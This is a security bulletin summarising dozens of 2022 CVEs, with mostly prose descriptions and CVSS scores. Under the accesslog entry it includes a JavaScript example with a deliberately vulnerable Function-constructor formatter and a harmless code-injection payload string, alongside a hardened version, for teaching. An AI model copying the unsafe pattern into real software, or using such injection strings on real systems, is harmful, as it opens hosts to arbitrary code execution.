fasterxml — jackson-databind jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. 2022-03-11 5 CVE-2020-36518
MISC
gpac — gpac GPAC 1.0.1 is affected by a NULL pointer dereference in gf_dump_vrml_field.isra (). 2022-03-14 4.3 CVE-2022-24574
MISC
gpac — gpac GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box. 2022-03-12 6.8 CVE-2022-26967
MISC
gpac — gpac GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box. 2022-03-14 6.8 CVE-2022-24575
MISC
MISC
gpac — gpac GPAC 1.0.1 is affected by Use After Free through MP4Box. 2022-03-14 4.3 CVE-2022-24576
MISC
MISC
huawei — atune In atune before 0.3-0.8, a local user can run the curl command against the local atune URL interface to escalate local privileges or modify any file, because authentication is not enforced in the default configuration. 2022-03-11 4.6 CVE-2021-33658
CONFIRM
intel — atom_c2308 Hardware allows activation of test or debug logic at runtime for some Intel(R) Trace Hub instances which may allow an unauthenticated user to potentially enable escalation of privilege via physical access. 2022-03-11 4.6 CVE-2021-33150
MISC
king-theme — kingcomposer The Page Builder KingComposer WordPress plugin through 2.9.6 does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action available to both unauthenticated and authenticated users 2022-03-14 6.8 CVE-2022-0165
MISC
lg — webos A heap vulnerability in the V8 JavaScript engine can lead to privilege escalation, which can impact some webOS TV models. 2022-03-11 4.6 CVE-2022-23731
MISC
liblouis — liblouis Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c). 2022-03-13 6.8 CVE-2022-26981
MISC
libtiff — libtiff Out-of-bounds Read error in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 408976c4. 2022-03-11 4.3 CVE-2022-0924
MISC
CONFIRM
MISC
libtiff — libtiff Null source pointer passed as an argument to memcpy() function within TIFFFetchNormalTag () in tif_dirread.c in libtiff versions up to 4.3.0 could lead to Denial of Service via crafted TIFF file. 2022-03-11 4.3 CVE-2022-0908
CONFIRM
MISC
MISC
libtiff — libtiff Unchecked Return Value to NULL Pointer Dereference in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f2b656e2. 2022-03-11 4.3 CVE-2022-0907
MISC
CONFIRM
MISC
libtiff — libtiff Divide By Zero error in tiffcrop in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit f8d0f9aa. 2022-03-11 4.3 CVE-2022-0909
MISC
MISC
CONFIRM
lua — lua Use after free in garbage collector and finalizer of lgc.c in Lua interpreter 5.4.0~5.4.3 allows attackers to perform Sandbox Escape via a crafted script file. 2022-03-14 4.3 CVE-2021-44964
MISC
MISC
MISC
MISC
MISC
microweber — microweber The Backup/Restore feature can be abused to achieve remote code execution in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-11 6.5 CVE-2022-0921
MISC
CONFIRM
microweber — microweber Integer Overflow or Wraparound in GitHub repository microweber/microweber prior to 1.3. 2022-03-11 5 CVE-2022-0913
CONFIRM
MISC
microweber — microweber XSS on dynamic_text module in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-12 4.3 CVE-2022-0929
MISC
CONFIRM
mirametrix — glance Mirametrix Glance before 5.1.1.42207 (released on 2018-08-30) allows a local attacker to elevate privileges. NOTE: this is unrelated to products from the glance.com and glance.net websites. 2022-03-13 4.6 CVE-2022-24696
MISC
molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool The MOLIE WordPress plugin through 0.5 does not escape the course_id parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2021-25006
MISC
moodle — moodle The last time a user accessed the mobile app is displayed on their profile page, but should be restricted to users with the relevant capability (site administrators by default). Moodle versions 3.10 to 3.10.3 are affected. 2022-03-11 4 CVE-2021-32477
MISC
moodle — moodle The redirect URI in the LTI authorization endpoint required extra sanitizing to prevent reflected XSS and open redirect risks. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8 and earlier unsupported versions are affected. 2022-03-11 4.3 CVE-2021-32478
MISC
moodle — moodle An SQL injection risk existed on sites with MNet enabled and configured, via an XML-RPC call from the connected peer host. Note that this required site administrator access or access to the keypair. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 6.5 CVE-2021-32474
MISC
moodle — moodle A denial-of-service risk was identified in the draft files area, due to it not respecting user file upload limits. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 5 CVE-2021-32476
MISC
moodle — moodle It was possible for a student to view their quiz grade before it had been released, using a quiz web service. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 5 CVE-2021-32473
MISC
onenav_project — onenav An issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal. 2022-03-12 5 CVE-2022-26276
MISC
oppo — coloros In ACE2 ColorOS11, the attacker can obtain the foreground package name through permission promotion, resulting in user information disclosure. 2022-03-11 5 CVE-2021-23246
MISC
orchardcore — orchardcore Cross-site Scripting (XSS) – Stored in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 4.3 CVE-2022-0820
CONFIRM
MISC
orchardcore — orchardcore Improper Authorization in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 4 CVE-2022-0821
CONFIRM
MISC
phpliteadmin — phpliteadmin phpLiteAdmin through 1.9.8.2 allows XSS via the index.php newRows parameter (aka num or number). 2022-03-13 4.3 CVE-2021-46709
MISC
ponton — x/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. Anti-CSRF tokens are globally valid, making the web application vulnerable to a weakened version of CSRF, where an arbitrary token of a low-privileged user (such as operator) can be used to confirm actions of higher-privileged ones (such as xpadmin). 2022-03-13 6.8 CVE-2021-45886
MISC
MISC
redhat — decision_manager A flaw was found in JBoss-client: a memory leak on the JBoss client side when UserTransaction is used repeatedly, leading to an information leakage vulnerability. 2022-03-11 5 CVE-2022-0853
MISC
MISC
saleor — saleor Improper Authorization in GitHub repository saleor/saleor prior to 3.1.2. 2022-03-11 4 CVE-2022-0932
CONFIRM
MISC
secomea — gatemanager Cross-site Scripting (XSS) vulnerability in the firmware section of Secomea GateManager allows a logged-in user to inject JavaScript into the browser session. This issue affects: Secomea GateManager Version 9.6.621421014 and all prior versions. 2022-03-11 4.3 CVE-2021-32009
MISC
smartertools — smartertrack Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack. This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 4.3 CVE-2022-24384
CONFIRM
CONFIRM
smartertools — smartertrack A Direct Object Access vulnerability in SmarterTools SmarterTrack leads to information disclosure. This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 4 CVE-2022-24385
CONFIRM
CONFIRM
smartertools — smartertrack With administrator or admin privileges, the application can be tricked into overwriting files in the app_data/Config folder, e.g. the systemsettings.xml file. This is possible in SmarterTrack v100.0.8019.14010. 2022-03-14 6.5 CVE-2022-24387
CONFIRM
CONFIRM
softing — datafeed_opc_suite An issue was discovered in Softing OPC UA C++ SDK before 5.70. An invalid XML element in the type dictionary makes the OPC/UA client crash due to an out-of-memory condition. 2022-03-11 4 CVE-2021-42262
MISC
MISC
softing — datafeed_opc_suite An issue was discovered in Softing OPC UA C++ SDK before 5.70. A malformed OPC/UA message abort packet makes the client crash with a NULL pointer dereference. 2022-03-11 5 CVE-2021-42577
MISC
MISC
techspawn — wp-email-users The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks. 2022-03-14 6.5 CVE-2021-24959
MISC
timescale — timescaledb Timescale TimescaleDB 1.x and 2.x before 2.5.2 may allow privilege escalation during extension installation. The installation process uses commands such as CREATE x IF NOT EXISTS that allow an unprivileged user to pre-create objects. These objects are then used by the installer (which executes as Superuser), leading to privilege escalation. To take advantage of this, an unprivileged user would need to be able to create objects in a database and then get a Superuser to install TimescaleDB into that database. (In the fixed versions, the installation aborts when it finds that an object already exists.) 2022-03-13 6 CVE-2022-24128
MISC
CONFIRM
tipsandtricks-hq — simple_download_monitor The Simple Download Monitor WordPress plugin before 3.9.5 allows users with a role as low as Contributor to download any file on the web server (such as wp-config.php) via a path traversal vector. 2022-03-14 4 CVE-2021-24692
MISC
wire — wire Wire-ios is a messaging application using the Wire protocol on Apple's iOS platform. In versions prior to 3.95, malformed resource identifiers may render the iOS Wire client completely unusable by causing it to repeatedly crash on launch. These malformed resource identifiers can be generated and sent between Wire users. The root cause lies in [wireapp/wire-ios-transport](https://github.com/wireapp/wire-ios-transport), where code responsible for removing sensitive tokens before logging may fail and lead to a crash (Swift exception) of the application. This causes undesirable behavior, but the wider Wire system is still functional. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. 2022-03-11 4 CVE-2022-23625
MISC
MISC
CONFIRM
wki — idpay_for_contact_form_7 The IDPay for Contact Form 7 WordPress plugin through 2.1.2 does not sanitise and escape the idpay_error parameter before outputting it back in the page leading to a Reflected Cross-Site Scripting 2022-03-14 4.3 CVE-2021-24996
MISC
woocommerce — persian-woocommerce The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2021-24940
MISC
yokogawa — centum_cs_3000_firmware The ‘Root Service’ service implemented in the following Yokogawa Electric products creates named pipes with an improper ACL configuration: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6.9 CVE-2022-22148
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Log Server contained in the following Yokogawa Electric products fails to properly neutralize log outputs: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-22151
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Log Server contained in the following Yokogawa Electric products is vulnerable to uncontrolled resource consumption. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-22145
CONFIRM
yokogawa — centum_cs_3000_firmware There is a path traversal vulnerability in CAMS for HIS Log Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.9 CVE-2022-21177
CONFIRM
yokogawa — centum_cs_3000_firmware CAMS for HIS Server contained in the following Yokogawa Electric products improperly authenticates received packets; the authentication may be bypassed via crafted packets: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, and Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6 CVE-2022-22729
CONFIRM
yokogawa — centum_cs_3000_firmware Path traversal vulnerability exists in CAMS for HIS Server contained in the following Yokogawa Electric products: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6 CVE-2022-21808
CONFIRM
yokogawa — centum_cs_3000_firmware The ‘Long-term Data Archive Package’ service implemented in the following Yokogawa Electric products creates named pipes with an improper ACL configuration: CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 4.4 CVE-2022-22141
CONFIRM
yokogawa — centum_vp_firmware The following Yokogawa Electric products do not change the passwords of the internal Windows accounts from the initial configuration: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 6.8 CVE-2022-21194
CONFIRM


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
amd — athlon_x4_940_firmware Some AMD CPUs may transiently execute beyond unconditional direct branches, which may potentially result in data leakage. 2022-03-11 2.1 CVE-2021-26341
MISC
MLIST
amd — athlon_x4_940_firmware LFENCE/JMP (mitigation V2-2) may not sufficiently mitigate CVE-2017-5715 on some AMD CPUs. 2022-03-11 1.9 CVE-2021-26401
MISC
MLIST
b3log — vditor Cross-site Scripting (XSS) – Stored in GitHub repository vanessa219/vditor prior to 3.8.12. 2022-03-14 3.5 CVE-2022-0341
CONFIRM
MISC
bluproducts — g90_firmware An issue was discovered in Luna Simo PPR1.180610.011/202001031830. It sends the following Personally Identifiable Information (PII) in plaintext using HTTP to servers located in China: user’s list of installed apps and device International Mobile Equipment Identity (IMEI). This PII is transmitted to log.skyroam.com.cn using HTTP, independent of whether the user uses the Simo software. 2022-03-11 2.1 CVE-2021-41849
MISC
MISC
MISC
MISC
childtheme-generator — child_theme_generator The Child Theme Generator WordPress plugin through 2.2.7 does not sanitise or escape the parade parameter before outputting it back, leading to a Reflected Cross-Site Scripting issue in the admin dashboard. 2022-03-14 3.5 CVE-2021-24982
MISC
html5_responsive_faq_project — html5_responsive_faq The HTML5 Responsive FAQ WordPress plugin through 2.8.5 does not properly sanitise and escape some of its settings, which could allow high-privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2022-03-14 3.5 CVE-2021-24995
MISC
intel — atom_c3308 Non-transparent sharing of branch predictor within a context in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. 2022-03-11 2.1 CVE-2022-0002
MISC
MLIST
intel — atom_p5921b Non-transparent sharing of branch predictor selectors between contexts in some Intel(R) Processors may allow an authorized user to potentially enable information disclosure via local access. 2022-03-11 2.1 CVE-2022-0001
MISC
MLIST
linux — linux_kernel An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device. 2022-03-12 2.1 CVE-2022-26966
MISC
MISC
microweber — microweber File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-12 3.5 CVE-2022-0930
MISC
CONFIRM
microweber — microweber Unrestricted Upload of File with Dangerous Type in GitHub repository microweber/microweber prior to 1.2.11. 2022-03-11 3.5 CVE-2022-0912
MISC
CONFIRM
microweber — microweber File upload filter bypass leading to stored XSS in GitHub repository microweber/microweber prior to 1.2.12. 2022-03-12 3.5 CVE-2022-0926
MISC
CONFIRM
moodle — moodle ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk. Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, 3.5 to 3.5.17 and earlier unsupported versions are affected. 2022-03-11 3.5 CVE-2021-32475
MISC
moodle — moodle Teachers exporting a forum in CSV format could receive a CSV of forums from all courses in some circumstances. Moodle versions 3.10 to 3.10.3, 3.9 to 3.9.6 and 3.8 to 3.8.8 are affected. 2022-03-11 2.6 CVE-2021-32472
MISC
openbsd — openssh ** DISPUTED ** An issue was discovered in OpenSSH before 8.9. If a client is using public-key authentication with agent forwarding but without -oLogLevel=verbose, and an attacker has silently modified the server to support the None authentication option, then the user cannot determine whether FIDO authentication is going to confirm that the user wishes to connect to that server, or that the user wishes to allow that server to connect to a different server on the user’s behalf. NOTE: the vendor’s position is “this is not an authentication bypass, since nothing is being bypassed.” 2022-03-13 2.6 CVE-2021-36368
MISC
MISC
CONFIRM
MISC
orchardcore — orchardcore Cross-site Scripting (XSS) – Reflected in GitHub repository orchardcms/orchardcore prior to 1.3.0. 2022-03-11 3.5 CVE-2022-0822
CONFIRM
MISC
patreon — patreon_wordpress The Patreon WordPress plugin before 1.8.2 does not sanitise and escape the field “Custom Patreon Page name”, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 3.5 CVE-2021-25026
MISC
CONFIRM
ponton — x/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. Several functions are vulnerable to reflected XSS, as demonstrated by private/index.jsp?partners/ShowNonLocalPartners.do?localID= or private/index.jsp or private/index.jsp?database/databaseTab.jsp or private/index.jsp?activation/activationMainTab.jsp or private/index.jsp?communication/serverTab.jsp or private/index.jsp?emailNotification/notificationTab.jsp. 2022-03-13 3.5 CVE-2021-45889
MISC
MISC
ponton — x/p_messenger An issue was discovered in PONTON X/P Messenger before 3.11.2. The navigation tree that is shown on the left side of every page of the web application is vulnerable to XSS: it allows injection of JavaScript into its nodes. Creating such nodes is only possible for users who have the role Configuration Administrator or Administrator. 2022-03-13 3.5 CVE-2021-45888
MISC
MISC
showdoc — showdoc Cross-site Scripting (XSS) – Stored in GitHub repository star7th/showdoc prior to 2.10.2. 2022-03-12 3.5 CVE-2022-0880
MISC
CONFIRM
showdoc — showdoc Stored XSS via cshtm file upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0946
CONFIRM
MISC
showdoc — showdoc Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0941
CONFIRM
MISC
showdoc — showdoc Stored XSS due to Unrestricted File Upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0940
MISC
CONFIRM
showdoc — showdoc Stored XSS via file upload in GitHub repository star7th/showdoc prior to v2.10.4. 2022-03-14 3.5 CVE-2022-0938
CONFIRM
MISC
showdoc — showdoc Stored XSS in showdoc through file upload in GitHub repository star7th/showdoc prior to 2.10.4. 2022-03-14 3.5 CVE-2022-0937
MISC
CONFIRM
smartertools — smartertrack Stored XSS in SmarterTools SmarterTrack. This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. 2022-03-14 3.5 CVE-2022-24386
CONFIRM
CONFIRM
thememove — insight_core The Insight Core WordPress plugin through 1.0 does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks 2022-03-14 3.5 CVE-2021-24950
MISC
tribalsystems — zenario Zenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload of a *.SVG file. An attacker can send malicious files to victims and steal the victim's cookie, leading to account takeover. Anyone viewing the image of a contact can be a victim of the XSS. 2022-03-14 3.5 CVE-2021-41952
MISC
viitorcloud — add_subtitle The Add Subtitle WordPress plugin through 1.1.0 does not sanitise or escape the sub-title field (available only with classic editor) when output in the page, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks 2022-03-14 3.5 CVE-2021-24897
MISC
webbigt — cybersoldier The Cybersoldier WordPress plugin before 1.7.0 does not sanitise and escape the URL settings before outputting it in an attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed 2022-03-14 3.5 CVE-2021-24895
MISC
yokogawa — centum_cs_3000_firmware The following Yokogawa Electric products contain insecure DLL loading issues. CENTUM CS 3000 versions from R3.08.10 to R3.09.00, CENTUM VP versions from R4.01.00 to R4.03.00, from R5.01.00 to R5.04.20, and from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00. 2022-03-11 3.7 CVE-2022-23401
CONFIRM


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
389_directory_server — 389_directory_server A vulnerability was discovered in the 389 Directory Server that allows an unauthenticated attacker with network access to the LDAP port to cause a denial of service. The denial of service is triggered by a single message sent over a TCP connection; no bind or other authentication is required. The message triggers a segmentation fault that results in slapd crashing. 2022-03-16 not yet calculated CVE-2022-0918
MISC
MISC
accelerated_mobile_pages — accelerated_mobile_pages Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31). 2022-03-18 not yet calculated CVE-2021-23150
CONFIRM
CONFIRM
accelerated_mobile_pages — accelerated_mobile_pages Multiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32). 2022-03-18 not yet calculated CVE-2021-23209
CONFIRM
CONFIRM
accesslog — accesslog All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on. 2022-03-17 not yet calculated CVE-2022-25760
MISC
MISC
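The accesslog entry above describes the classic code-injection shape: a format string is spliced into source text handed to the `Function` constructor, so whoever controls the format controls the generated code. The snippet below is an added example written for this bulletin, not code from the accesslog package; it assumes a morgan-style `:field` token syntax and a `fields` object of request attributes, both of which are illustrative. `compileFormatUnsafe` reproduces the vulnerable pattern, and `compileFormatSafe` tokenises the format once and interpolates values at call time without ever generating code.

```javascript
// Vulnerable pattern: the format string becomes JavaScript source.
// A format such as  '" + (globalThis.pwned = true) + "'  closes the string
// literal and runs attacker code as soon as the formatter is invoked.
function compileFormatUnsafe(format) {
  const body = 'return "' + format.replace(/:(\w+)/g, '" + fields.$1 + "') + '";';
  return new Function('fields', body); // eslint-disable-line no-new-func
}

// Hardened pattern: parse the format into literal and field tokens once, then
// render by concatenation. No source text is generated, so the format string
// can only influence which field names are looked up.
function compileFormatSafe(format) {
  const tokens = [];
  const tokenRe = /:(\w+)/g;
  let last = 0;
  let match;
  while ((match = tokenRe.exec(format)) !== null) {
    if (match.index > last) tokens.push({ literal: format.slice(last, match.index) });
    tokens.push({ field: match[1] });
    last = tokenRe.lastIndex;
  }
  if (last < format.length) tokens.push({ literal: format.slice(last) });

  return function render(fields) {
    let out = '';
    for (const tok of tokens) {
      if (tok.literal !== undefined) {
        out += tok.literal;
      } else if (Object.prototype.hasOwnProperty.call(fields, tok.field)) {
        // Own-property check: ':constructor' or ':__proto__' in a format
        // must not walk up the prototype chain of the fields object.
        out += String(fields[tok.field]);
      } else {
        out += '-';
      }
    }
    return out;
  };
}

// Constructed request attributes and payload for the demonstration.
const SAMPLE_FIELDS = { method: 'GET', url: '/login', status: 200 };
const MALICIOUS_FORMAT = '" + (globalThis.pwned = true) + "';

function demo() {
  delete globalThis.pwned;
  compileFormatUnsafe(MALICIOUS_FORMAT)(SAMPLE_FIELDS);
  const unsafeExecutedInjection = globalThis.pwned === true;

  delete globalThis.pwned;
  const safeOutput = compileFormatSafe(MALICIOUS_FORMAT)(SAMPLE_FIELDS);
  const safeExecutedInjection = globalThis.pwned === true;

  return {
    normal: compileFormatSafe(':method :url :status')(SAMPLE_FIELDS),
    unsafeExecutedInjection,
    safeExecutedInjection,
    safeOutput,
    prototypeLookup: compileFormatSafe(':method :constructor')(SAMPLE_FIELDS),
  };
}

console.log(demo());
```

The general rule the example illustrates: a format or template supplied by a caller is data, and the only safe way to honour it is to interpret it with a parser whose output is a sequence of lookups and literals, never to turn it into code for `new Function` or `eval`.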
admidio — admidio Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9. 2022-03-19 not yet calculated CVE-2022-0991
MISC
CONFIRM
adobe — acrobat_reader_dc Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24092
MISC
adobe — acrobat_reader_dc Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24091
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40740
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40737
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40738
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40739
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40735
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40741
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40742
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40736
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a SVG file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40734
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42729
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious PSD file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42730
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42720
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42722
MISC
adobe — bridge Adobe Bridge 11.1.1 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Bridge. 2022-03-16 not yet calculated CVE-2021-42728
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42724
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a double free vulnerability when parsing a crafted DCM file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2022-03-16 not yet calculated CVE-2021-42533
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .jpe file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42719
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40750
MISC
